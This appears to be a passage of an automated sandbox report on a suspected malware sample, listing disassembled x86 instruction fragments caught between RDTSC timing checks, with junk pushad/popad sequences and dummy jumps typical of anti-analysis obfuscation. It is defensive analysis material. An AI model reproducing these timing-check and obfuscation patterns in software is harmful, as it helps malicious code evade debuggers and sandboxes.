Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F1AFF second address: 4CF1BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007FE6E8F184B8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 movzx edx, ax 0x00000024 lea eax, dword ptr [ebp+12486879h] 0x0000002a js 00007FE6E8F184BCh 0x00000030 mov edi, dword ptr [ebp+122D2CC0h] 0x00000036 mov edx, dword ptr [ebp+122D2DB4h] 0x0000003c push eax 0x0000003d push ecx 0x0000003e push edx 0x0000003f jc 00007FE6E8F184B6h 0x00000045 pop edx 0x00000046 pop ecx 0x00000047 mov dword ptr [esp], eax 0x0000004a mov ecx, 256092ACh 0x0000004f call dword ptr [ebp+122D1E9Ah] 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FE6E8F184BAh 0x0000005c pushad 0x0000005d push ecx 0x0000005e pop ecx 0x0000005f jmp 00007FE6E8F184C8h 0x00000064 jmp 00007FE6E8F184BBh 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F2119 second address: 4F215A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 213D3015h 0x00000010 call 00007FE6E8B29089h 0x00000015 pushad 0x00000016 push edx 0x00000017 jmp 00007FE6E8B29094h 0x0000001c pop edx 0x0000001d je 00007FE6E8B2908Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F215A second address: 4F2188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 js 00007FE6E8F184C4h 0x0000000c jmp 00007FE6E8F184BEh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE6E8F184BEh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F2188 second address: 4F2192 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE6E8B2908Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F2403 second address: 4F241C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE6E8F184BBh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F241C second address: 4F2438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B29098h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F2438 second address: 4F2462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FE6E8F184C6h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F2462 second address: 4F2466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F2466 second address: 4F246A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F246A second address: 4F2470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F252F second address: 4F2535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F2982 second address: 4F2989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F2E2B second address: 4F2E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FE6E8F184BFh 0x00000017 popad 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FE6E8F184B8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 lea eax, dword ptr [ebp+12486879h] 0x0000003a or dh, 0000000Ch 0x0000003d pushad 0x0000003e mov dx, ax 0x00000041 cld 0x00000042 popad 0x00000043 nop 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F2E8C second address: 4F2E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F2E91 second address: 4F2EB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F2EB4 second address: 4F2EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F2EB8 second address: 4F2EBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F2EBE second address: 4CFC72 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007FE6E8B29086h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call dword ptr [ebp+122D2318h] 0x00000013 jmp 00007FE6E8B29094h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE6E8B29092h 0x0000001f jg 00007FE6E8B29092h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 51F9DE second address: 51F9E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 51F9E3 second address: 51F9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 51FC87 second address: 51FC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 51FC8B second address: 51FCBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29093h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FE6E8B2908Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FE6E8B2908Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 51FDF1 second address: 51FDFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 51FDFB second address: 51FE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 51FF7E second address: 51FF8A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE6E8F184B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 51FF8A second address: 51FFA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B29093h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4CFC6E second address: 4CFC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 529023 second address: 52904A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE6E8B2908Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE6E8B2908Dh 0x00000011 ja 00007FE6E8B29086h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52904A second address: 529050 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5291CA second address: 5291D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5291D5 second address: 5291F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE6E8F184C1h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5291F2 second address: 5291F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 529471 second address: 529477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 529477 second address: 52947D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5295EA second address: 5295F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5295F2 second address: 5295F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5295F8 second address: 52960B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE6E8F184BEh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 529A67 second address: 529A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29092h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FE6E8B29093h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 529A98 second address: 529AA2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE6E8F184B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 529AA2 second address: 529AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jnp 00007FE6E8B29086h 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 529AB3 second address: 529AD3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FE6E8F184B6h 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007FE6E8F184C1h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52F0BA second address: 52F0CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52F0CF second address: 52F0E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BFh 0x00000007 je 00007FE6E8F184B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52F80E second address: 52F81D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52FAE4 second address: 52FAF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52FAF5 second address: 52FB1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FE6E8B29086h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE6E8B29092h 0x00000013 jp 00007FE6E8B29086h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52FB1B second address: 52FB1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52FB1F second address: 52FB2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52FB2E second address: 52FB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE6E8F184B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52FCEA second address: 52FCFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE6E8B2908Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 530191 second address: 530198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 530198 second address: 5301AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FE6E8B2908Dh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5301AF second address: 5301B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5301B3 second address: 5301BD instructions: 0x00000000 rdtsc 0x00000002 js 00007FE6E8B29086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52E97E second address: 52E990 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FE6E8F184B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52E990 second address: 52E996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52E996 second address: 52E99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52E99E second address: 52E9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE6E8B2908Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 52E9AD second address: 52E9CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE6E8F184BDh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 533377 second address: 533381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE6E8B29086h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 533381 second address: 5333A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C5h 0x00000007 jmp 00007FE6E8F184BCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5352B4 second address: 5352BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 53B894 second address: 53B89F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FE6E8F184B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 53BB53 second address: 53BB5F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE6E8B29086h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 53BCC7 second address: 53BCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F1BD4 second address: 4F1BF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE6E8B2908Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F286C second address: 4F2875 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 53CB0D second address: 53CB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE6E8B29096h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 53CB27 second address: 53CB2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 53CB2B second address: 53CB31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 541F6A second address: 541F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jnp 00007FE6E8F184B6h 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 541F87 second address: 541F9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29092h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5420CE second address: 5420DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007FE6E8F184B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5420DA second address: 5420E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 542539 second address: 54253D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5427B2 second address: 5427C7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE6E8B29086h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007FE6E8B29086h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5427C7 second address: 5427CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 545B8D second address: 545BB0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE6E8B29086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE6E8B29096h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 545BB0 second address: 545BB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54516D second address: 545177 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE6E8B29086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 545177 second address: 5451CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FE6E8F184C7h 0x0000000e jmp 00007FE6E8F184BFh 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007FE6E8F184C5h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jc 00007FE6E8F184B6h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54533C second address: 54535E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29094h 0x00000007 jne 00007FE6E8B29086h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 545552 second address: 54555E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007FE6E8F184B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54555E second address: 545566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 545566 second address: 54558C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE6E8F184B6h 0x00000008 jmp 00007FE6E8F184C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5458AC second address: 5458B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b rdtsc
